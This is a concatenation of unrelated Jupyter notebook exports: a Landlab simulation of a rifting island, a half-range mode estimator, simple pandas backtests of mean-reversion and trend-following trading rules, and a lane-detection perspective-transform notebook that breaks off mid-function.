4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7,
6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6,
5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. ,
5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2,
5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4,
6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2,
6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9,
6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9])}],
'layout': {'template': '...',
'title': {'text': 'Sepal Width vs Sepal Length'},
'xaxis': {'title': {'text': 'sepal_width'}},
'yaxis': {'title': {'text': 'sepal_length'}}}
})
|
evolve_island_world_gmd2106.ipynb | ###Markdown
Evolve Island World*(Greg Tucker, University of Colorado Boulder, spring 2021)*(Version GMD2106)Demonstration of a Landlab-built simulation of the morphological evolution of a hypothetical island micro-continent.This version was configured to generate an illustration to accompany a manuscript by Tucker et al., submitted to Geoscientific Model Development in summer 2021. Set up and initialize
###Code
from landlab.io.native_landlab import load_grid, save_grid
from landlab import imshow_grid, RasterModelGrid
import time
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import cmocean
import datetime
###Output
_____no_output_____
###Markdown
Set parameters
###Code
# Parameters: subaerial erosion/transport/deposition
K_br = 1.0e-5 # fluvial erosion coefficient, 1/y
v_s = 1.0 # fluvial deposition parameter, -
# Parameters: submarine sediment transport
sea_level_delta = 0.4 # scale factor for random SL variation, m
wave_base = 50.0 # depth to wave base, m
marine_diff = 100.0 # marine sediment diffusivity, m2/y
# Parameters: tectonics and flexure
extension_rate = 0.01 # horizontal extension rate, m/y
fault_dip = 60.0 # surface fault dip, degrees
fault_location = 4.0e4 # location parameter for fault, m
detachment_depth = 1.0e4 # depth to decollement, m
effective_elastic_thickness = 1.0e4 # elastic thickness, m
crust_datum = -1.5e4 # depth to datum in crust, m
unit_wt = 2650.0 * 9.8 # unit weight of load, kg / m s2
# Parameters: numerics and run control
dt = 100.0 # time-step duration, y
num_iter = 2500 # number of iterations
plot_interval = 2000.0 # time interval for plotting, y
save_interval = 25000.0 # time interval for saving grid, y
ndigits = 3 # number of digits for output files
seed = 1 # random seed
# Parameters: plotting and display
max_elev_for_color_scale = 1650.0 # elevation for color scale in plotting, m
scale_fac_for_surface_water = 0.3 # surface water gets color equiv to -this times above scale, -
area_threshold = 5.0e7 # minimum drainage area for displayed streams, m2
# Derived or initial parameters
current_sea_level = 0.0
next_plot = plot_interval # next time to plot
next_save = save_interval # next time to save grid
frame_num = 0 # current output image frame number
save_num = 0 # current save file frame number
save_name = 'rift-island-save'
# Other initialization
np.random.seed(seed)
sea_level = [] # list of sea-level values over time
###Output
_____no_output_____
###Markdown
Load grid and topographyWe start with a previously generated hex grid. This grid includes a topography field that represents a quasi-circular oceanic plateau. We also want to record the perimeter node IDs so we can work with them later.
###Code
grid = load_grid('initial_island.grid')
z = grid.at_node['topographic__elevation']
perimeter_nodes = grid.status_at_node != grid.BC_NODE_IS_CORE
###Output
_____no_output_____
###Markdown
Display initial topography
###Code
cmap = copy.copy(mpl.cm.get_cmap("seismic"))
scale = np.amax(np.abs(z))
imshow_grid(grid, z, vmin=-scale, vmax=scale, cmap=cmap)
###Output
_____no_output_____
###Markdown
Create a raster grid for flexureThe 2D elastic lithosphere flexure component `Flexure` requires a raster grid (not hex). We will therefore define a separate raster grid for this operation. The grid has the same number of rows and columns as the hex grid, and the same spacing on the two axes. The only difference is that the hex grid has alternate rows offset by half a grid width. (Because we assume that the flexural wavelength is much longer than this, we don't bother interpolating between the grids.)
###Code
flex_rast_grid = RasterModelGrid((grid.number_of_node_rows,
grid.number_of_node_columns),
xy_spacing=(grid.spacing,
0.866 * grid.spacing))
###Output
_____no_output_____
###Markdown
Create grid fieldsIn addition to the `topographic__elevation` field, and the output fields created by the various Components, we need the following fields:- *Water surface elevation:* the "filled topography" field used by the flow routing and depression-filling algorithms (using a separate field allows us to fill depressions with water rather than raising the topographic elevations).- *Subaerial flag:* boolean field indicating whether a given node is above current relative sea level.- *Cumulative deposit thickness:* used to track the thickness of sediment and (where negative) cumulative exhumation.- *Upper crust thickness:* used in flexural isostasy calculations to keep track of the time- and space-varying load.- *Load:* the weight per unit area of rock/sediment (note: in this version we do not track water loading, though ultimately one should).
###Code
# Add field(s)
wse = grid.add_zeros('water_surface__elevation',
at='node',
clobber=True)
subaerial = grid.add_zeros('is_subaerial',
at='node',
dtype=bool,
clobber=True)
cum_depo = grid.add_zeros('cumulative_deposit_thickness',
at='node')
thickness = grid.add_zeros('upper_crust_thickness',
at='node')
load = flex_rast_grid.add_zeros(
'lithosphere__overlying_pressure_increment',
at='node'
)
###Output
_____no_output_____
###Markdown
Import ComponentsHere we import the Components needed for this model:- FlowAccumulator: handles subaerial routing of surface-water flow. Also creates a FlowDirectorSteepest and a LakeMapperBarnes.- ErosionDeposition: handles erosion and deposition by fluvial processes, using the Davy & Lague (2009) equations.- SimpleSubmarineDiffuser: transports sediment under water using diffusion with a coefficient that varies with local water depth.- ListricKinematicExtender: calculates tectonic extension on an idealized listric normal fault, with periodic horizontal shift of topography in the hangingwall.- Flexure: handles 2D elastic lithosphere flexure.
###Code
from landlab.components import (FlowAccumulator,
ErosionDeposition,
SimpleSubmarineDiffuser,
ListricKinematicExtender,
Flexure
)
###Output
_____no_output_____
###Markdown
Instantiate ComponentsNote that Flexure gets its own grid.
###Code
fa = FlowAccumulator(grid,
depression_finder='LakeMapperBarnes',
fill_surface=wse,
redirect_flow_steepest_descent=True,
reaccumulate_flow=True)
ed = ErosionDeposition(grid,
K=K_br,
v_s=v_s,
solver='adaptive')
sd = SimpleSubmarineDiffuser(grid,
sea_level=0.0,
wave_base=wave_base,
shallow_water_diffusivity=marine_diff)
ke = ListricKinematicExtender(grid,
extension_rate=extension_rate,
fault_dip=fault_dip,
fault_location=fault_location,
detachment_depth=detachment_depth,
track_crustal_thickness=True
)
fl = Flexure(flex_rast_grid,
eet=effective_elastic_thickness,
method='flexure'
)
###Output
_____no_output_____
###Markdown
Define sea level functionThis function adds or subtracts a random amount to the current sea level.
###Code
def sea_level_random(current_sea_level, delta):
return current_sea_level + delta * np.random.randn()
###Output
_____no_output_____
###Markdown
Set up flexure and tectonic subsidenceTo initialize calculation of flexural isostasy and rift-related subsidence, we need to calculate:- the starting crustal thickness (above the datum, which is arbitrary)- the load created by this thickness- the initial lithospheric deflection (calculated via a call to Flexure.update())We save this initial deflection, so that for each time step we can calculate the net deflection over time (in other words, the initial deflection is assumed to be "already accounted for" in the initial topography).We also create a shorthand variable, *cum_subs*, to access the cumulative subsidence field.
###Code
# Prepare flexure and tectonic subsidence
thickness[:] = z - crust_datum
load[:] = unit_wt * thickness
fl.update()
deflection = flex_rast_grid.at_node['lithosphere_surface__elevation_increment']
init_deflection = deflection.copy()
cum_subs = grid.at_node['cumulative_subsidence_depth']
# for tracking purposes
init_thickness = thickness.copy()
###Output
_____no_output_____
###Markdown
Create a display functionThis function displays the current topography, and saves a plot to file.
###Code
def display_island(grid, current_sea_level, frame_num, ndigits):
z = grid.at_node['topographic__elevation']
fa.run_one_step() # re-run flow router to update the water-surface height
wse = grid.at_node['water_surface__elevation']
fresh_water_elev_scale = -(scale_fac_for_surface_water
* max_elev_for_color_scale)
earth_sea = z - current_sea_level
area = grid.at_node['drainage_area']
is_channel_or_flooded = np.logical_or(area > area_threshold,
wse > z)
is_fresh_water = np.logical_and(is_channel_or_flooded,
earth_sea > 0.0)
earth_sea[is_fresh_water] = fresh_water_elev_scale
imshow_grid(grid, earth_sea,
cmap=cmocean.cm.topo,
vmin=-max_elev_for_color_scale,
vmax=max_elev_for_color_scale)
plt.axis(False)
plt.savefig('island' + str(frame_num).zfill(ndigits) + '.png')
###Output
_____no_output_____
###Markdown
Display the starting topographyCreate an image of the starting condition.
###Code
display_island(grid, 0.0, 0, ndigits)
###Output
_____no_output_____
###Markdown
Run Tectonics and flexureThe kinematic extender updates the cumulative subsidence created by the fact that the hangingwall is sliding down a listric ramp. The load is then calculated based on the current thickness minus what has been lost to subsidence (because subsidence comes from local thinning of the crust as the hangingwall slides by, in general replacing a thicker slice with a thinner one). The isostatic deflection is calculated based on the updated load. The topography is then updated by adding the thickness field to the crustal datum elevation, and subtracting the cumulative subsidence plus the isostatic subsidence (which in many places will be negative, i.e., isostatic uplift in response to tectonic and erosional thinning). Sea levelCurrent sea level is updated, and appended to the list to keep track of sea-level history. Subaerial and submarine nodes are identified based on the new sea level. Copying present topographyWe make a copy of the topography at this point in order to later calculate the *change* in topography due to erosion and sedimentation. Subaerial erosion and depositionIn order to restrict subaerial flow routing and fluvial erosion/deposition to land only, we change the boundary status such that all submarine nodes are flagged as boundary (fixed-value) nodes. We then run the flow-routing algorithms, followed by running the ErosionDeposition (fluvial) Component for one time step. Submarine erosion and depositionIn order to keep track of sediment delivered to the shoreline by rivers, we take the fluvial sediment-influx field, which is in m3/y, and convert it to a deposition rate by dividing by cell area. For submarine nodes, which were previously treated as boundaries and so were not updated for deposition, we now deposit this material by adding one time step's worth of deposition. We now apply submarine water-depth-dependent diffusion. This calculation will be applied to the entire grid, with an arbitrarily small diffusion coefficient applied to subaerial nodes. To enable this, we switch the boundary status of submarine nodes back to CORE, while keeping the perimeter nodes as open (fixed-value) boundaries. Cumulative erosion and depositionWe update the cumulative erosion/deposition by differencing the topography before and after this latest time step (because we copied the topography *after* doing tectonics and flexure, we include here only the effects of erosion and deposition). Updating crustal thicknessWe need to keep track of crustal thickness for the flexure calculations. Here we modify the crustal thickness by adding/subtracting the deposition/erosion from this time step. Plotting and savingWe periodically pause to plot an image of the model to a file, and/or to save the run to a Landlab .grid file.
###Code
for i in range(1, num_iter + 1):
print(i)
# Tectonic extension & flexure
ke.run_one_step(dt) # update extensional subsidence
load[grid.core_nodes] = (unit_wt
* (thickness[grid.core_nodes]
- cum_subs[grid.core_nodes]))
fl.update() # update flexure
z[:] = (crust_datum + thickness
- (cum_subs + (deflection - init_deflection)))
# Adjust sea level
current_sea_level = sea_level_random(current_sea_level,
sea_level_delta)
print('Sea level = ' + str(current_sea_level) + ' m')
sea_level.append(current_sea_level)
subaerial[:] = z > current_sea_level
submarine = np.invert(subaerial)
# Remember previous topo
z0 = z.copy()
# Subaerial erosion
# a. make the submarine nodes open boundaries
grid.status_at_node[submarine] = grid.BC_NODE_IS_FIXED_VALUE
grid.status_at_node[subaerial] = grid.BC_NODE_IS_CORE
# b. route flow
fa.run_one_step()
# c. do some erosion
ed.run_one_step(dt)
# Submarine deposition
depo_rate = ed._qs_in / grid.area_of_cell[0]
z[submarine] += depo_rate[submarine] * dt
# Submarine diffusion
# a. make the submarine nodes core
grid.status_at_node[submarine] = grid.BC_NODE_IS_CORE
grid.status_at_node[perimeter_nodes] = grid.BC_NODE_IS_FIXED_VALUE
# b. diffuse
sd.sea_level = current_sea_level
sd.run_one_step(dt)
# Cumulative depo
cum_depo[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes]
# Update crustal thickness
thickness[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes]
# Plot
if i*dt >= next_plot:
frame_num += 1
plt.clf()
display_island(grid, current_sea_level, frame_num, ndigits)
next_plot += plot_interval
# Save
if i*dt >= next_save:
save_num += 1
this_save_name = (save_name
+ str(save_num).zfill(ndigits)
+ '.grid')
save_grid(grid, this_save_name, clobber=True)
next_save += save_interval
###Output
_____no_output_____
###Markdown
FinalizeHere we do some plotting of the model's state at the end of the run. Topography & bathymetryNote that bathymetry is cut off; colors indicating the deepest level should be taken as meaning that deep OR DEEPER.
###Code
import cmocean
import datetime
area_threshold = 5e7
za = grid.at_node['topographic__elevation'] - current_sea_level
cscale = 1500.0
deep_water_scale = -cscale
river_scale = -0.5 * cscale
river = np.logical_and(
grid.at_node['drainage_area'] > area_threshold,
za > 0.0
)
za[river] = river_scale
za[za < deep_water_scale] = deep_water_scale
fa.run_one_step()
lake = np.logical_and(wse > z, za > 0.0)
za[lake] = river_scale
imshow_grid(grid, za, cmap=cmocean.cm.topo, vmin=-cscale,
vmax=cscale)
plt.axis(False)
figname = ('rift-island-t'
+ str(int(num_iter * dt))
+ '-'
+ datetime.date.today().strftime('%y%m%d')
+ '.pdf'
)
plt.savefig(figname)
###Output
_____no_output_____
###Markdown
Cumulative deposition/erosion
###Code
cdep = cum_depo.copy()
cdep[perimeter_nodes] = 0.0
dmax = np.amax(np.abs(cdep))
imshow_grid(grid, cdep, cmap='Spectral', vmin=-dmax, vmax=dmax)
plt.axis(False)
plt.savefig('cum_depo.png')
###Output
_____no_output_____
###Markdown
Sea-level history
###Code
plt.plot(0.001 * dt * np.arange(len(sea_level)), sea_level)
plt.xlabel('Time since start of run (ky)')
plt.ylabel('Sea level (m)')
plt.title('Sea level history')
plt.grid(True)
###Output
_____no_output_____
###Markdown
Cross-sectional profile
###Code
startnode = ((grid.number_of_node_rows // 2)
* grid.number_of_node_columns)
endnode = startnode + grid.number_of_node_columns
midrow = np.arange(startnode, endnode, dtype=int)
x = 0.001 * grid.spacing * np.arange(0.0, len(midrow))
plt.figure()
plt.plot(x, z[midrow] - np.maximum(cdep[midrow], 0.0),
'k:', label='Basement')
plt.plot(x, z[midrow], 'g', label='Surface')
plt.plot([0, max(x)],
[current_sea_level, current_sea_level],
label='Sea level'
)
plt.xlabel('Distance (km)')
plt.ylabel('Elevation (m)')
plt.legend()
plt.grid(True)
###Output
_____no_output_____
###Markdown
Flexure
###Code
net_flex = init_deflection - deflection
imshow_grid(flex_rast_grid, net_flex)
###Output
_____no_output_____ |
Half Range Mode Estimation.ipynb | ###Markdown
from scipy.stats import normimport matplotlib.pyplot as pltimport numpy as npimport math%matplotlib inline
###Code
beta = 0.5
# Example of [1,2,2,3,4]
def HRM(v, N):
#print()
#print("v", v)
#print('len(v)', len(v))
# Step 2
# If we only have 1 or 2 values, just return their mean
if N == 1 or N == 2:
return v.mean()
# Step 3
# calculate the interval width, this method gets it's name
# with a Beta of 0.5 or half-width. Other Beta values can
# be used for different effects
# This is half the width of the full range of data
w = beta*(v[-1]-v[0])
#print("w", w)
# Step 4
# Create N-1 intervals called I
# each interval is of w width
I=[]
for j in range(0, N-1): # j = 1 to N-1, paper is 1 based index
I.append((v[j], v[j]+w) )
I = np.array(I)
#print('I', I)
#print('len I', len(I))
# Step 4.5
# for each interval, determine how many values are in each interval
cnt = np.array([((rng[0] <= v) & (v <= rng[1])).sum() for rng in I])
N_prime = max(cnt)
#print('cnt', cnt)
#print('len(cnt)', len(cnt))
#print("N_prime", N_prime)
# Step 5
if (cnt == N_prime).sum() == 1:
J = I[np.where(cnt == N_prime)[0][0]]
v = v[np.logical_and(v>=J[0], v<=J[1])]
return HRM(v, len(v))
# Step 6
IJ = []
for Ii in I[cnt==N_prime]:
IJ.append(v[(Ii[0]<=v) & (v<=Ii[1])])
# Step 7
w_prime = np.ptp(IJ, axis=1).min()
# Step 8
Vmin = v[-1] # default to our array's min/max
Vmax = v[0]
for IJi in IJ:
if (IJi[-1]-IJi[0]) == w_prime:
if (IJi[0]<Vmin): Vmin = IJi[0]
if (IJi[-1]>Vmax): Vmax = IJi[-1]
# Step 9
min_index = np.argmax(v==Vmin)
v_back = v[::-1]
max_index = len(v)-np.argmax(v_back==Vmax)-1
N_prime_prime = max_index-min_index+1
# Step 10
v = v[min_index:max_index+1]
# Step 11
if N == N_prime_prime:
# this should not happen for continous data, but regardless we need to have a case for it
# Essentially this means that we did not progress this itteration
if (v[2]-v[1]) < (v[-1]-v[-2]):
v = v[:-1]
N_prime_prime = N_prime_prime - 1
elif (v[2]-v[1]) > (v[-1]-v[-2]):
v = v[1:]
N_prime_prime = N_prime_prime - 1
else:
v = v[1:-1]
N_prime_prime = N_prime_prime - 2
# Step 12
N = N_prime_prime
return HRM(v, N)
def graph(modal, numBins, title):
count, bins, ignored = plt.hist(modal, numBins)
modal.sort()
hrm = HRM(modal, len(modal))
mean=modal.mean()
median=np.median(modal)
handles=[]
handles.append(plt.axvline(x=hrm, color='fuchsia', label='Half-Range: {0:.2f}'.format(hrm)))
handles.append(plt.axvline(x=mean, color='y', label='Mean: {0:.2f}'.format(mean)))
handles.append(plt.axvline(x=median, color='g', label='Median: {0:.2f}'.format(median)))
plt.legend(handles=handles)
plt.title(title, {'fontsize': 20})
plt.show()
modal = np.random.normal(10, 3, 5000)
graph(modal, 40, 'Normal Distribution')
modal = np.random.exponential(2, 5000)
graph(modal, 40, 'Exponential Distribution')
modal1 = np.random.normal(10, 3, 2500)
modal2 = np.random.normal(20, 3, 2500)
modal = np.concatenate((modal1, modal2))
graph(modal, 40, 'Bi-Modal Distribution')
modal = np.random.lognormal(10, 0.7, 5000)
graph(modal, 40, 'Log Normal Distribution')
###Output
_____no_output_____ |
ipython/qa.ipynb | ###Markdown
7. Quantitative Trading
###Code
data['close'].plot()
bors = data.loc['2016-07-01':]
k, b = calc.linear_regression_kb(bors['close'].values);
degree = np.rad2deg(k)
model, zoom_factor = calc.linear_regression_y(bors['close'].values, zoom=True)
k2 = model.params[1]
b2 = model.params[0]
degree2 = np.rad2deg(k2)
x = np.arange(0, bors['close'].shape[0])
reg_y_fit = x * k + b
reg_y_fit2 = x * k2 + b2
_, axes = plt.subplots(nrows=1, ncols=2, figsize=(20, 5))
axes[0].set_title(f"No zoom. degree={degree}")
axes[0].plot(x, bors['close'].values, '')
axes[0].plot(x, reg_y_fit, 'r')
axes[1].set_title(f"with zoom, degree={degree2}")
axes[1].plot(x, bors['close'].values, '')
axes[1].plot(x, reg_y_fit2/zoom_factor, 'r')
###Output
_____no_output_____
###Markdown
7.1 Mean-reversion strategy - the train dataset is the data from the year before last (the second-most-recent year). - the test dataset is the data from the most recent year.
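The rule implemented in the cells below can be summarised as follows (a sketch, with $\mu$ and $\sigma$ the mean and standard deviation of the training-period close): buy (hold, `signal = 1`) when $close \le \mu - \sigma/3$, and sell (go flat, `signal = 0`) when $close \ge \mu + \sigma/3$.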
###Code
Y1=-252
train = data.iloc[Y1*2:Y1];train.head()
train.shape
test = data.iloc[Y1:];test.head()
test.shape
close_mean = train.close.mean()
close_std = train.close.std()
sell_signal = close_mean + close_std / 3
buy_signal = close_mean - close_std /3
plt.figure(figsize=(20,7))
plt.title(f"Train dataset: close_mean={close_mean}, close_std={close_std}")
train.close.plot()
plt.axhline(buy_signal, color='r', lw=3)
plt.axhline(close_mean, color='black', lw=1)
plt.axhline(sell_signal, color='g', lw=3)
plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'],
loc='best')
plt.figure(figsize=(20,7))
plt.title(f"Test dataset: close_mean={close_mean}, close_std={close_std}")
test.close.plot()
plt.axhline(buy_signal, color='r', lw=3)
plt.axhline(close_mean, color='black', lw=1)
plt.axhline(sell_signal, color='g', lw=3)
plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'],
loc='best')
test.loc[test['close'] <= buy_signal, 'signal'] = 1
test.loc[test['close'] >= sell_signal,'signal'] = 0
test['keep'] = test['signal']
test['keep'].fillna(method='ffill', inplace=True)
#test.loc['2017-03-01':'2017-05-01']
###Output
/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:1: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead
See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
"""Entry point for launching an IPython kernel.
/opt/conda/lib/python3.6/site-packages/pandas/core/generic.py:3191: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame
See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
self._update_inplace(new_data)
###Markdown
> benchmark_profit2 is included to verify that benchmark_profit is correct.> We can use ***np.log(close / close.shift(1))*** to calculate the (log) return.
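A quick worked example with made-up prices shows why log returns are convenient: they add up over time, and `np.exp` of the cumulative sum recovers the total return multiple.
```python
import numpy as np

prices = np.array([100.0, 110.0, 99.0])      # made-up closes
log_ret = np.log(prices[1:] / prices[:-1])   # log(110/100), log(99/110)

print(log_ret.sum())            # equals log(99/100)
print(np.exp(log_ret.sum()))    # 0.99, the total return multiple over the period
```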
###Code
test['benchmark_profit'] = np.log(test['close'] / test['close'].shift(1))
test['benchmark_profit2'] = (test['close'] - test['close'].shift(1)) /test['close'].shift(1)
test[['benchmark_profit','benchmark_profit2']].plot(subplots=True, grid=True, figsize=(14,7))
test.head()
test['trend_profit'] = test['keep'] * test['benchmark_profit']
test['trend_profit'].plot(figsize=(20, 7))
#test.loc['2017-03-01':'2017-05-01']
test[['benchmark_profit', 'trend_profit']].cumsum().plot(grid=True, figsize=(20, 7))
###Output
_____no_output_____
###Markdown
> ***np.exp*** shows the overall investment return multiple (about 1.2) more clearly, rather than the cumulative (log) growth rate
###Code
test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7))
###Output
_____no_output_____
###Markdown
2. Trend-following strategy. N1: the highest price within the last N1 days is the buy signal. N2: the lowest price within the last N2 days is the sell signal. N1 > N2
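In other words (a summary of the rule coded below, similar in spirit to a Donchian-channel breakout): go long (`signal = 1`) when today's close rises above the previous N1-day rolling high, and go flat (`signal = 0`) when it falls below the previous N2-day rolling low.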
###Code
N1=42
N2=21
test = data.loc['2016-06-1':].copy(); test.head()  # .copy() avoids SettingWithCopyWarning on the assignments below
test['n1_high'] = test['high'].rolling(N1).max()
test['n2_low'] = test['low'].rolling(N2).min()
expan_max = test['close'].expanding().max()
expan_min = test['low'].expanding().min()
test['n1_high'].fillna(value=expan_max, inplace=True)
test['n2_low'].fillna(value=expan_min, inplace=True)
test.head()
test.loc[test['close']>test['n1_high'].shift(1), 'signal'] = 1
test.loc[test['close']<test['n2_low'].shift(1), 'signal'] = 0
test.head()
test['keep'] = test['signal'].shift(1)
test['keep'].fillna(method='ffill', inplace=True)
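# Note on look-ahead bias: the signals above compare today's close against *yesterday's*
# N1-high / N2-low (shift(1) on the channel), and 'keep' shifts the signal once more, so a
# breakout observed at today's close is only held from the next bar onward.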
test['benchmark_profit'] = np.log(test['close']/test['close'].shift(1))
test['trend_profit'] = test['keep'] * test['benchmark_profit']
test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7))
#test.loc['2016-10-15':'2016-11-15']
###Output
_____no_output_____ |
examples/03-PerspectiveTransform.ipynb | ###Markdown
Advanced Lane Finding Project. The goals / steps of this project are the following: * Compute the camera calibration matrix and distortion coefficients given a set of chessboard images. * Apply a distortion correction to raw images. * Use color transforms, gradients, etc., to create a thresholded binary image. * **Apply a perspective transform to rectify binary image ("birds-eye view").** * **Detect lane pixels and fit to find the lane boundary.** * **Determine the curvature of the lane and vehicle position with respect to center.** * **Warp the detected lane boundaries back onto the original image.** * **Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.** --- Apply a perspective transform to rectify binary image
###Code
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
import pickle
%matplotlib inline
ym_per_pix = 30 / 720
xm_per_pix = 3.7 / 700
parameters = pickle.load(open('./camera_calibration_parameters', 'rb'))
mtx, dist = map(parameters.get, ('mtx', 'dist'))
def region_lines(origin_img, vertices):
img = origin_img.copy()
for i in range(vertices.shape[1]-1):
cv2.line(img, tuple(tuple(vertices[:, i])[0]), tuple(tuple(vertices[:, i+1])[0]), (0, 255, 0), 10)
cv2.line(img, tuple(tuple(vertices[:, vertices.shape[1]-1])[0]), tuple(tuple(vertices[:, 0])[0]), (0, 255, 0), 10)
return img
img = cv2.imread('../test_images/test3.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
undist = cv2.undistort(img, mtx, dist, None, mtx)
imshape = undist.shape
vertices = np.array([[(200, imshape[0]), (imshape[1]/2-40, imshape[0]*.6),
(imshape[1]/2+40, imshape[0]*.6), (1200, imshape[0])]], dtype=np.float32)
img_with_region_lines = region_lines(img, vertices)
plt.imshow(img_with_region_lines)
plt.imshow(img)
gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)
src = vertices
X, Y = imshape[1], imshape[0]
offset = 200
dst = np.float32([
(offset, Y),
(offset, 0),
(X-offset, 0),
(X-offset, Y)
])
print (src)
print (dst)
def bird_eye(img, src, dst):
h, w = img.shape[:2]
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
warped = cv2.warpPerspective(img, M, (w, h), flags=cv2.INTER_LINEAR)
return warped, M, Minv
binary_warped, M, Minv = bird_eye(undist, src, dst)
#plt.imshow(binary_warped)
# Draw the destination guide lines on a copy so that the warped image used for
# thresholding further below is not polluted by the debug overlay.
binary_warped_vis = binary_warped.copy()
cv2.line(binary_warped_vis, (200, 720), (200, 0), (0, 255, 0), 10)
cv2.line(binary_warped_vis, (1080, 720), (1080, 0), (0, 255, 0), 10)
plt.imshow(binary_warped_vis, cmap='gray')
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10))
ax1.imshow(img_with_region_lines)
ax1.set_title('Undistorted Image with source points drawn')
ax2.imshow(binary_warped_vis, cmap='gray')
ax2.set_title('Warped result with destination points drawn')
plt.savefig('warped_binary.jpg')
###Output
_____no_output_____
###Markdown
Detect lane pixels
###Code
def find_lane_pixels(binary_warped):
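    # Sliding-window search (summary of the steps below): take a column-wise histogram of
    # the bottom half of the warped binary image, use its two peaks as starting x positions
    # for the left/right lanes, then walk nwindows windows up the image, re-centering each
    # window on the mean x of the nonzero pixels it contains, and finally return the pixel
    # coordinates collected for each lane.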
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:, :], axis=0)
out_img = np.dstack((binary_warped, binary_warped, binary_warped))
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
nwindows = 9
margin = 100
minpix = 50
window_height = np.int(binary_warped.shape[0]//nwindows)
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_inds = []
right_lane_inds = []
for window in range(nwindows):
win_y_low = binary_warped.shape[0] - (window + 1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
pass
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty, out_img
def fit_polynomial(binary_warped):
leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
print('The function failed to fit a line!')
left_fitx = 1 * ploty ** 2 + 1 * ploty
right_fitx = 1 * ploty ** 2 + 1 * ploty
out_img[lefty, leftx] = [255, 0, 0]
out_img[righty, rightx] = [0, 0, 255]
plt.plot(left_fitx, ploty, color='yellow')
plt.plot(right_fitx, ploty, color='yellow')
# Fit a second order polynomial to each
left_fit_m = np.polyfit(lefty*ym_per_pix, leftx*xm_per_pix, 2)
right_fit_m = np.polyfit(righty*ym_per_pix, rightx*xm_per_pix, 2)
return out_img, left_fit, right_fit, left_fit_m, right_fit_m, ploty
def space_thresh(img, thresh_min, thresh_max):
binary = np.zeros_like(img)
binary[(img >= thresh_min) & (img <= thresh_max)] = 1
return binary
def abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255):
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)
sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1)
abs_sobelx = np.absolute(sobelx)
abs_sobely = np.absolute(sobely)
scaled_sobel = 0
if orient == 'x':
